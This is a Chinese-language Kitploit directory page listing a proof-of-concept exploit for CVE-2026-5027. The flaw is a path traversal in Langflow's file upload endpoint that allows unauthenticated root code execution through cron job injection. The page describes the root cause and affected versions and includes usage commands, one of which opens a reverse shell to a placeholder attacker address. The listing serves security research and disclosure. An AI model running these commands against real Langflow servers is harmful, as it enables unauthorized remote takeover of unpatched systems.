Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5027 — 针对 CVE-2026-5027 的概念验证漏洞利用程序,该漏洞是 Langflow 中的路径遍历漏洞,可通过 cron 任务注入导致未认证的远程代码执行。 | Kitploit
工具/GitHubGitHub/yahiahamza/cve-2026-5027
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubyahiahamza/cve-2026-5027

CVE-2026-5027

针对 CVE-2026-5027 的概念验证漏洞利用程序,该漏洞是 Langflow 中的路径遍历漏洞,可通过 cron 任务注入导致未认证的远程代码执行。

查看仓库
424个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-5027 - Langflow 路径遍历导致远程代码执行

描述

Langflow 1.8.4 及更早版本未对 POST /api/v2/files 端点中的 filename 参数进行清理。攻击者可以利用路径遍历序列(../)将文件写入文件系统上的任意位置。结合 Langflow 默认的自动登录配置,该漏洞可在无需任何身份验证的情况下被利用,通过 cron 任务注入实现以 root 权限执行远程代码。

受影响版本

  • 受影响: Langflow <= 1.8.4
  • 已修复: 撰写本文时暂无可用补丁
  • 默认配置: 自动登录已启用(可未授权利用)
  • 安全公告: Tenable TRA-2026-26

使用方法

root@kitploit:~
# 概念验证(将测试文件写入 /tmp/)
python3 exploit.py -t http://target:7860

# 使用凭据(如果自动登录已禁用)
python3 exploit.py -t http://target:7860 -u admin -p password

# 通过 cron 任务实现反向 Shell
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444

示例输出

CVE-2026-5027 Exploit

CVE-2026-5027 Reverse Shell

根本原因

src/backend/base/langflow/api/v2/files.py 中的 upload_user_file() 函数将 file.filename 直接传递给存储服务,未进行任何清理。LocalStorageService.save_file() 使用 folder_path / file_name 构造路径,无法阻止目录遍历。

参考链接

  • Tenable Advisory TRA-2026-26
  • Langflow GitHub
  • CVE-2026-5027: Langflow 路径遍历导致 RCE - 完整技术分析

免责声明

本工具仅供授权安全测试和教育目的使用。仅可在您拥有或已获得明确测试许可的系统上使用。

作者

Yahia Hamza - https://yh.do

下载工具